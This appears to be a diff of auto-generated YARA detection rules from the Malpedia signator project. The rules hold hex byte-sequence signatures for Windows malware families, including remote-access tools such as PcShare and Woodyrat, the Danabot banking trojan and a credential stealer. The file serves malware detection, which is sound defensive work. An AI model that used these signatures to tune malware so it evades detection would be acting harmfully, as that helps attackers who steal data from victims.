 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "76748fdd-5448-52e3-b40a-c8804bcac97d"
+		id = "44778796-93f3-5879-994d-5e3e2324b3e0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.allaple_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_053_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "89aee7277247b951ca979dcece1297fc5fda6e02a408403041aa3b0414e347cd"
+		logic_hash = "0ba9fcbf3221aa7fe9aa16ac81cd13a3c2e0b0b30a12bf9f5e09619187f5d921"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126185,71 +126066,71 @@ rule MALPEDIA_Win_Allaple_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945f4 57 ff75fc e8???????? 8945f0 897de8 897dec }
-		$sequence_1 = { 83c704 c70704000000 83c704 6a18 ff7510 57 e8???????? }
-		$sequence_2 = { c7420c76543210 8be5 5d c3 55 8bec }
-		$sequence_3 = { 0345d8 50 e8???????? 83c408 a3???????? 6a03 ff35???????? }
-		$sequence_4 = { 8b45e4 33c2 8945e4 8b4dec 8b55f0 8d044a 0345b0 }
-		$sequence_5 = { 52 ff750c e8???????? 47 4b 83c604 0bdb }
-		$sequence_6 = { 50 ff75fc e8???????? 8d85c0feffff 50 8d85c4feffff }
-		$sequence_7 = { 6a00 6a64 8d8544fdffff 50 e8???????? 6a00 }
-		$sequence_8 = { 8b55fc 8b4238 3345f4 8b4df8 894138 8b55fc 8b423c }
-		$sequence_9 = { 8975f0 6a50 e8???????? 668945ee 6a10 8d45ec 50 }
+		$sequence_0 = { 0f857afeffff 393cb500924100 742e a1???????? 8d70ff 85f6 }
+		$sequence_1 = { 0fb6bdb0fffcff c1e208 0bd7 03d0 2bca 6a00 }
+		$sequence_2 = { 754d 53 57 8d3c85a8914100 833f00 bb00100000 7520 }
+		$sequence_3 = { 7e13 8d048dfc914100 3938 7408 4a }
+		$sequence_4 = { 8a6e1b 0fb64619 0fb67df4 8a4e1a }
+		$sequence_5 = { 81e9003ca875 87d6 4e 46 87d6 81c1003ca875 }
+		$sequence_6 = { 0fb6d2 f6820194410004 7406 8b10 41 }
+		$sequence_7 = { c1c719 e8???????? 87f2 e8???????? 2bd5 }
+		$sequence_8 = { 891d???????? 4a 87d6 8915???????? 03f7 46 893d???????? }
+		$sequence_9 = { 8b048588814100 234508 8b4e14 8d04c1 0fb64801 8b5004 83fa10 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Komprogo_Auto : FILE
+rule MALPEDIA_Win_Miancha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b83eddfd-6609-5160-bb17-24d52dab0572"
+		id = "fc1eda3c-bd5f-5571-91d7-7aefaea33797"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.komprogo_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miancha_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "5f20beca4c5ecafddf1c339febd8122f816667a260edfabf9768a16c874c78f2"
+		logic_hash = "f932de22bd95ab60efbbe4e694e46f3915e7f38800c91edc1e731744ddf1fb94"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { e8???????? 68???????? 8d45f4 50 c745f400614100 e8???????? cc }
-		$sequence_1 = { c745ec00000000 84c0 7407 be01000000 eb15 51 e8???????? }
-		$sequence_2 = { 899ef6e80000 899eeca10000 8d8610700300 8986aee90000 8d861c970300 898632ea0000 }
-		$sequence_3 = { 8d55f0 52 8b11 8d45f4 50 52 }
-		$sequence_4 = { 899e876b0000 51 8b4dfc 899e9a6b0000 8d8696d20300 }
-		$sequence_5 = { 8d85e4f3ffff 50 8d8decfdffff 51 c78584f3ffff44000000 ff15???????? 8bf0 }
-		$sequence_6 = { 51 8d86a0d00300 8bcb e8???????? 83c404 84c0 }
-		$sequence_7 = { 8d8650e60300 8d961ef30100 898623bc0200 899634320200 8d8636a50200 898675af0200 }
-		$sequence_8 = { 8d8ee0920000 898e1caa0300 8d8e80720300 8d96305d0300 51 8b4df4 8d8600cf0300 }
-		$sequence_9 = { 89966c940300 8d9698ec0300 89964da90200 898e88aa0200 8986cbaa0200 8d860cea0300 8986f7aa0200 }
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { c744242000000000 ff15???????? 50 ff15???????? 8bf0 85f6 }
+		$sequence_1 = { 56 8b35???????? 6a02 6a00 68???????? }
+		$sequence_2 = { ffd6 85c0 741a 837c241800 7413 }
+		$sequence_3 = { 68???????? c744242000000000 ff15???????? 50 ff15???????? 8bf0 85f6 }
+		$sequence_4 = { 8b0d???????? 895008 8a15???????? 89480c }
+		$sequence_5 = { 52 6803000080 ff15???????? 85c0 741f }
+		$sequence_6 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? 89480c }
+		$sequence_7 = { 85c0 741a 837c241800 7413 }
+		$sequence_8 = { ff15???????? 8bf0 85f6 7412 8d542418 }
+		$sequence_9 = { 40 50 56 8b35???????? 6a02 6a00 }
 
 	condition:
-		7 of them and filesize < 1045504
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Woodyrat_Auto : FILE
+rule MALPEDIA_Win_Pcshare_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff2403f4-80f5-5a92-a716-69463c81a517"
+		id = "7a2279a4-a61d-58a7-97d7-adf12e2edb7d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woodyrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.woodyrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pcshare_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "0875a91df86b2a6e691c8414a33ce11802859bc8c34fd58e245e57021b392621"
+		logic_hash = "2997345c16432720db338f1e799076d538b35e40830e87863ce57c0bb0f81979"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126263,32 +126144,32 @@ rule MALPEDIA_Win_Woodyrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? c745fcffffffff 83c404 8b4db0 8bf8 85c9 7411 }
-		$sequence_1 = { c7473400000000 c7473800000000 0f104624 0f114724 f30f7e4634 660fd64734 66894624 }
-		$sequence_2 = { 2bc1 c1f803 69f0abaaaaaa b8aaaaaa0a 8bce d1e9 2bc1 }
-		$sequence_3 = { 0f57c0 c707???????? 0f43c8 660fd64704 8d4704 c745a800000000 50 }
-		$sequence_4 = { ff15???????? 0f57c0 c78558ecffff00000000 660fd68550ecffff 6800010000 c78554ecffff20000000 c78558ecffff00010000 }
-		$sequence_5 = { 0f114630 e9???????? 8bc1 b9feffff7f 83c807 3dfeffff7f 0f47c1 }
-		$sequence_6 = { 7409 50 e8???????? 83c404 837dd000 8b45cc 7704 }
-		$sequence_7 = { 40 894dc8 50 ff75e0 51 e8???????? 8b45c0 }
-		$sequence_8 = { 50 8d8de4f9ffff e8???????? 8bbd10f9ffff 8d8dd8f9ffff 8b7f08 89bd10f9ffff }
-		$sequence_9 = { 899d44ffffff 50 52 c78540ffffff00000000 ff15???????? 6898000000 8d8558ffffff }
+		$sequence_0 = { 803c3800 75db 8b16 33c0 8a0c3a 5f 84c9 }
+		$sequence_1 = { 8db60c2c0610 6a00 50 ff36 e8???????? }
+		$sequence_2 = { 8b442450 3bc3 7425 33f6 8b0c06 }
+		$sequence_3 = { 81e20000ffff c7401400000000 0bca 89480c 8b4c2440 8b542438 }
+		$sequence_4 = { 8b4c242c 85c9 7510 3b5c2430 746b 43 }
+		$sequence_5 = { 8b01 03f8 8b5640 8b6e24 52 51 8bcc }
+		$sequence_6 = { 8b5b04 03d8 c60300 8b442428 50 }
+		$sequence_7 = { 8d0480 8d0c80 8d048a 3d35c83301 0f8cea000000 68???????? }
+		$sequence_8 = { 8b16 8d441a02 50 55 ff15???????? 85c0 890437 }
+		$sequence_9 = { 8b4548 8b4c241c 8b1408 8b442420 8b4c020c 8d44020c }
 
 	condition:
-		7 of them and filesize < 785408
+		7 of them and filesize < 893708
 }
-rule MALPEDIA_Win_Badaudio_Auto : FILE
+rule MALPEDIA_Win_Danabot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "05c804a9-cf16-57d2-a80f-b619976bbd0d"
+		id = "d405be96-12b3-5521-8438-92276494b614"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badaudio"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badaudio_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.danabot_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a6c973b5c41c14ecfe9459d805cffcba8f5aa17e724a8b86913ac3f147c5345e"
+		logic_hash = "d0742d8634d1bfb6b6cd9fd56080ad6a40985205234e33c349c6b1c80cbce68a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126302,32 +126183,32 @@ rule MALPEDIA_Win_Badaudio_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 886e09 88560d 886602 884e0a }
-		$sequence_1 = { c6470c00 807de000 0f8447ffffff 8b45dc c745dc00000000 8b4dd4 }
-		$sequence_2 = { 885c8103 40 83f83c 7463 8a7c81fc 0fb65481fd 0fb6f7 }
-		$sequence_3 = { f20f114030 f20f10442438 f20f114038 f20f108424e0000000 f20f114058 f20f108424d8000000 f20f114050 }
-		$sequence_4 = { 0f57d8 0f115c2411 0f10442461 0f104c2421 0f109424a1000000 }
-		$sequence_5 = { 8a4627 88431c 8a4626 88431d 8a4625 88431e 8a4624 }
-		$sequence_6 = { 8b540c48 89542438 83c104 894c2408 8b0c24 894c2430 }
-		$sequence_7 = { c7462800000000 c7462c0f000000 c6461800 f20f104010 f20f114310 }
-		$sequence_8 = { 8a442404 3287e4000000 884604 329fe5000000 885e05 3297e6000000 885606 }
-		$sequence_9 = { 0355e0 39d1 89d6 0f43f1 }
+		$sequence_0 = { 8b701c ad 0f1f00 8b4008 }
+		$sequence_1 = { 83f838 730b ba38000000 2bd0 }
+		$sequence_2 = { 8d45f8 50 6804010000 8d85e8fdffff 50 }
+		$sequence_3 = { e8???????? 8b03 50 8b442440 }
+		$sequence_4 = { e8???????? eb0e 8d541d00 8bc6 e8???????? 83c340 8d433f }
+		$sequence_5 = { 33c9 ba44000000 e8???????? c745b844000000 33c0 8945c0 }
+		$sequence_6 = { e8???????? 50 6aff 8bc6 e8???????? 50 6a01 }
+		$sequence_7 = { 8b55f4 8d45f8 e8???????? 8b55f8 8bc7 }
+		$sequence_8 = { 6a0e 8b45f8 50 ff15???????? 84c0 7447 33c0 }
+		$sequence_9 = { e8???????? 8bd8 8b17 8bc2 85c0 7407 83e804 }
 
 	condition:
-		7 of them and filesize < 1420288
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Evilgrab_Auto : FILE
+rule MALPEDIA_Win_Mosquito_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "262a5f1e-fc32-5e23-bc68-1916bf6229d5"
+		id = "34ccfc9c-1c07-526c-894b-5084961ae1c7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilgrab_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mosquito_auto.yar#L1-L177"
 		license_url = "N/A"
-		logic_hash = "f2b39911d0e0c2e89edee53b595cd7abbfb96f83612f1946b2208648a7f155b2"
+		logic_hash = "4f8e972330c002e4476c43f04fdf320df70c4455b51cf01f5f99efe08713790b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126341,34 +126222,43 @@ rule MALPEDIA_Win_Evilgrab_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b08 50 ff5108 83c8ff e9???????? 8b442410 50 }
-		$sequence_1 = { ff15???????? 894320 83f8ff 741e c785dce6ffff00000000 c6431601 6a46 }
-		$sequence_2 = { 0f8437feffff 8b442418 50 ff15???????? 5f 5e }
-		$sequence_3 = { 68ff000000 e8???????? 8bd0 b93f000000 33c0 8bfa f3ab }
-		$sequence_4 = { 55 56 3bc2 57 bd01000000 0f84ef010000 }
-		$sequence_5 = { c78514f6ffff00000000 b8???????? c3 8b8df0f5ffff 8b5124 89951cf6ffff b8???????? }
-		$sequence_6 = { ff8db4adffff 0f856dffffff 8d8dc0d2ffff 51 8bcb e8???????? e9???????? }
-		$sequence_7 = { 57 8d8de8adffff 51 8d95dcadffff 52 8d85e0adffff 50 }
-		$sequence_8 = { 33db 3bfb 7469 8b771c 3bf3 7462 395f20 }
-		$sequence_9 = { 83f802 0f84ca000000 83f801 7567 3be8 750b 56 }
+		$sequence_0 = { f7d8 1bc0 83e0b4 83c04c }
+		$sequence_1 = { 52 50 6a00 6801c1fd7d }
+		$sequence_2 = { 8bfc f3a5 ff942464020000 81c450020000 }
+		$sequence_3 = { 894b02 8bcf 8b17 ff5208 }
+		$sequence_4 = { 8b750c 57 894dfc 8d5e06 53 e8???????? 8bf8 }
+		$sequence_5 = { ff5010 85c0 7436 837dfc00 7409 }
+		$sequence_6 = { f3a5 ff942460020000 81c450020000 85c0 }
+		$sequence_7 = { e8???????? 6a20 8bf0 e8???????? 8bc8 }
+		$sequence_8 = { 51 8b55fc 52 8b45f8 50 ff15???????? 8b4dfc }
+		$sequence_9 = { 6801c1fd7d e8???????? 8bd8 eb02 }
+		$sequence_10 = { e8???????? 83c40c e8???????? 6a20 }
+		$sequence_11 = { 0000 006301 1000 7500 }
+		$sequence_12 = { ff15???????? 6a00 56 ff15???????? 8903 }
+		$sequence_13 = { 0000 006500 676c 0010 }
+		$sequence_14 = { 0000 00645657 8b7dc2 0400 }
+		$sequence_15 = { 0000 0032 08804d086440 5e }
+		$sequence_16 = { 0000 0001 1001 c550f0 8b8078005900 }
+		$sequence_17 = { 0000 0018 a0???????? 57 }
+		$sequence_18 = { 0000 00748078 3001 40 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 1015808
 }
-rule MALPEDIA_Win_Cadelspy_Auto : FILE
+rule MALPEDIA_Win_Kleptoparasite_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "239b2d97-ceb8-5e5b-be90-aeb9b9fcf209"
+		id = "b0b0b352-347f-55af-9ff0-490ede9b4160"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cadelspy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kleptoparasite_stealer_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "b4d9cbb0d8867220f80a8ce48db839eded436dcbd892904385e6486261b96542"
-		score = 75
-		quality = 75
+		logic_hash = "e5b373205c1fe87c3fe6e4fda207e494d76c79369af53b1f38b96981f46a089f"
+		score = 60
+		quality = 35
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -126380,32 +126270,32 @@ rule MALPEDIA_Win_Cadelspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3d01010000 7d0d 8a4c181c 888840360110 40 ebe9 }
-		$sequence_1 = { 7413 50 8b44241c 56 e8???????? 8bf8 59 }
-		$sequence_2 = { 89742424 e8???????? 33c0 bf06020000 57 6689842484040000 8d842486040000 }
-		$sequence_3 = { 8d9c2464020000 e8???????? 68???????? 8d9c2464020000 e8???????? }
-		$sequence_4 = { 8d859e000000 50 e8???????? 83c40c 56 8d859c000000 50 }
-		$sequence_5 = { 89742424 89742428 8974242c 89742430 89742434 89742438 e8???????? }
-		$sequence_6 = { 56 57 33ff 8db7b03e0110 ff36 e8???????? }
-		$sequence_7 = { ff742414 ffd3 8bc6 e8???????? 33c0 40 eb02 }
-		$sequence_8 = { 40 8b8d94260000 5f 5e 33cd 5b e8???????? }
-		$sequence_9 = { 39742414 0f84d3000000 397508 7474 8b4508 }
+		$sequence_0 = { c3 e9???????? 55 8bec 56 e8???????? 8bf0 }
+		$sequence_1 = { cc 55 8bec 56 e8???????? 8b7508 6a02 }
+		$sequence_2 = { b8???????? c3 e9???????? 55 8bec 56 e8???????? }
+		$sequence_3 = { 895104 8be5 5d c3 3b0d???????? 7502 f3c3 }
+		$sequence_4 = { 7405 8901 895104 8be5 5d c3 3b0d???????? }
+		$sequence_5 = { cc 55 8bec 56 e8???????? 8b7508 }
+		$sequence_6 = { 59 c3 6a10 68???????? e8???????? 33ff 897de0 }
+		$sequence_7 = { 895104 8be5 5d c3 3b0d???????? }
+		$sequence_8 = { 895104 8be5 5d c3 3b0d???????? 7502 }
+		$sequence_9 = { e8???????? cc 55 8bec 56 e8???????? 8b7508 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 3006464
 }
-rule MALPEDIA_Win_Toughprogress_Auto : FILE
+rule MALPEDIA_Win_Unidentified_078_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f7aead55-8a03-5bbf-af11-1841c77b5719"
+		id = "be01d120-44f2-52e2-a1fa-8d3ce9aeac2c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.toughprogress"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.toughprogress_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_078_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "639d2f4f2de7d57a54ced0a82f1a1b4924ec9dac72884175b29f7cbb63a0d4bc"
+		logic_hash = "e6046ec69321f4df1e212f93ebf4122d030058a32e3fabef5fe6e0f5f1575a85"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126419,32 +126309,32 @@ rule MALPEDIA_Win_Toughprogress_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48b93448af150d8462e4 4801c8 4c89e1 ffd0 488b05???????? 48b93b8ce2c7a3ecddc7 488b0408 }
-		$sequence_1 = { ffd7 0f104508 0f104d18 0f105524 410f1154244c 410f114c2440 410f11442430 }
-		$sequence_2 = { 48b93f5d14dd8256b94f 488b0408 4c01e8 4c89f9 4889fa 4189e8 ffd0 }
-		$sequence_3 = { ffd0 898688000000 488d8e8c000000 488b05???????? 48bab6b1569bc6a2bb92 48033c10 ffd7 }
-		$sequence_4 = { bd05000000 8d42cf 49bee5819fecd253eebe 83f809 0f8364020000 49bfdd819fecd253eebe 0f1f440000 }
-		$sequence_5 = { 4989d3 4983e307 7420 4531d2 6690 420fbe3c11 66418938 }
-		$sequence_6 = { 56 4883ec20 4889ce 488b05???????? 48b90d1dc3fe89299d3f 48ba098af7fc2873d775 48031408 }
-		$sequence_7 = { 884101 440fb64202 4489c0 34e2 4420c0 4189c1 4180e1fa }
-		$sequence_8 = { 84c0 0f85b2030000 488b07 4c8b36 0fb64f08 baffffffff 41baffffffff }
-		$sequence_9 = { 4d89c6 4889d6 488b05???????? 49b89bc488db85ad3022 48baadb54d2cbea5f70f 4a8b0400 4801d0 }
+		$sequence_0 = { 0f8412010000 0f8cee000000 80fa0d 0f8421010000 80fa1b 0f8576010000 }
+		$sequence_1 = { 0f8d94010000 80fa26 0f8f18010000 80fa23 0f8d82010000 }
+		$sequence_2 = { 80fa5c 0f94c1 80fa2f 0f94c2 08d1 }
+		$sequence_3 = { 3c18 0f8483000000 3c1c 740d 3c16 }
+		$sequence_4 = { e9???????? 80fa0c 0f8412010000 0f8cee000000 80fa0d }
+		$sequence_5 = { 89d6 0f883a020000 80fa21 0f8f8f000000 80fa20 0f8d28020000 }
+		$sequence_6 = { a910000108 753f a900004011 7521 a900000600 7467 }
+		$sequence_7 = { ff15???????? 85c0 740e e8???????? 31d2 89c1 e8???????? }
+		$sequence_8 = { b901010000 ff15???????? 85c0 740e }
+		$sequence_9 = { 0f8421010000 80fa1b 0f8576010000 ba02000000 e8???????? }
 
 	condition:
-		7 of them and filesize < 3117056
+		7 of them and filesize < 688128
 }
-rule MALPEDIA_Win_Stabuniq_Auto : FILE
+rule MALPEDIA_Win_Deadwood_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4275e6d0-94cf-5d7a-8be9-58ce93adc0df"
+		id = "b63793f4-2418-5ad7-9269-78c13c5e655b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stabuniq_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deadwood_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "27eb79a741b72a16cbff924e64623723e98e0bb2251ce5257f82f37046f960f7"
+		logic_hash = "37c079b3ff282377b03776f4a709dbdd660de9909aaf5ffcbe15f9216992b56f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126458,32 +126348,32 @@ rule MALPEDIA_Win_Stabuniq_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a05 8b55fc 52 8b4510 }
-		$sequence_1 = { 8b913c020000 52 8b45ec 50 8b4df0 51 8b5508 }
-		$sequence_2 = { 8b4508 50 8b4df8 ff91ec000000 8945fc 8b55f0 83ea04 }
-		$sequence_3 = { 8b55fc 52 8b4514 05ab0e0000 50 8b4d0c 51 }
-		$sequence_4 = { 8b4d0c 8d9401b2170000 52 8d85f8fdffff 50 8b4d0c ff5130 }
-		$sequence_5 = { 50 8b8d24fdffff 51 8b5510 ff520c 6a40 }
-		$sequence_6 = { 85c0 7535 8b8decfbffff 6bc928 8b5510 8d840ab2170000 50 }
-		$sequence_7 = { c745f800000000 837dfc00 7e32 8b55f8 83c201 8955f8 8b45fc }
-		$sequence_8 = { 83ba8000000000 750a b801000000 e9???????? 8b45f0 8b8880000000 034d08 }
-		$sequence_9 = { 8b4510 8b4d18 8a9411dc0e0000 8810 8b4510 83c001 }
+		$sequence_0 = { b9???????? c645fcc6 e8???????? 68???????? b9???????? c645fcc7 }
+		$sequence_1 = { 68f0d8ffff 57 56 e8???????? 89442428 8954242c }
+		$sequence_2 = { e8???????? 33c0 e9???????? 8975e4 33c0 39b8a0e34600 0f8491000000 }
+		$sequence_3 = { c1f803 57 83f828 0f8e27010000 40 99 83e207 }
+		$sequence_4 = { 895e14 385d0c 7409 c745e858f54500 eb06 8b4008 8945e8 }
+		$sequence_5 = { 52 c745fc04000000 e8???????? 8d4dd0 8d851cffffff e8???????? }
+		$sequence_6 = { 57 897dfc 57 c745c801000000 ff15???????? 8bf8 897dd0 }
+		$sequence_7 = { 57 33db 6807020000 8d85f5fdffff 53 50 8bf1 }
+		$sequence_8 = { 8bc2 c1e81f 03c2 03f8 83c40c 897d14 85f6 }
+		$sequence_9 = { ffd5 8b4c241c 64890d00000000 59 5f 5e 5d }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 1055744
 }
-rule MALPEDIA_Win_Gearshift_Auto : FILE
+rule MALPEDIA_Win_Dusttrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5cb12abd-628a-5169-a5df-e2c33952153a"
+		id = "6dc8c0b6-03e4-543a-8235-ad282f751715"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gearshift_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dusttrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dusttrap_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "e8d3111d44f6324e90544c2ebdde13a938df2e4a9f50331b57f760f4ee12b3d4"
+		logic_hash = "99d0157bbc57f142e4b3ca02f7a6fc667dbe8aaf793dc492ed4ef3b4577c5d17"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126497,32 +126387,32 @@ rule MALPEDIA_Win_Gearshift_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883ec20 85c9 7871 3b0d???????? 7369 4863d9 488d2dff1a0300 }
-		$sequence_1 = { 48895c2408 4889742410 48897c2418 498bf8 8bda 488bf1 443bca }
-		$sequence_2 = { e8???????? e9???????? 488b442450 488d0db7350300 488b04c1 41f644070840 }
-		$sequence_3 = { 4883c310 48ffce 75d4 488d1def070300 }
-		$sequence_4 = { 8b4ffc 41b940000000 41b800100000 488bd0 4903ce 488bd8 }
-		$sequence_5 = { 488b4c2430 4885c9 7406 ff15???????? 8bc7 eb02 }
-		$sequence_6 = { e8???????? 33c9 3d00040000 7510 e8???????? b801000000 4883c430 }
-		$sequence_7 = { 4883c328 0fb74806 443bf9 0f8c50ffffff 488b4500 8b4828 }
-		$sequence_8 = { 0f84ca020000 488d05d13b0300 4a8b04e0 41f644070880 0f84b3020000 e8???????? 33db }
-		$sequence_9 = { 488d542434 8bc8 ff15???????? 33c0 488d542438 }
+		$sequence_0 = { 4133c0 c1e008 33c2 4389848c40ec0200 c1c008 }
+		$sequence_1 = { 492bf4 75a9 488b9c24b80a0000 488bbc24a80a0000 4c8bbc24980a0000 4c8bac24a00a0000 488bb424b00a0000 }
+		$sequence_2 = { 478b9c8240dc0200 48c1e918 45339c9240e80200 41c1ef08 410fb6d7 4c8d3d5257ffff 45339c8a40d80200 }
+		$sequence_3 = { 4c8bf9 33d2 488b0d???????? 8bf5 488b89f8000000 e8???????? }
+		$sequence_4 = { 488bbc24a80a0000 4c8bbc24980a0000 4c8bac24a00a0000 488bb424b00a0000 4d85f6 743f 488b0d???????? }
+		$sequence_5 = { e8???????? 8bf0 85c0 0f85f4000000 0f57c0 }
+		$sequence_6 = { 498d4e30 4533c0 baa00f0000 e8???????? 488b05???????? 4c8d0539810100 488bd5 }
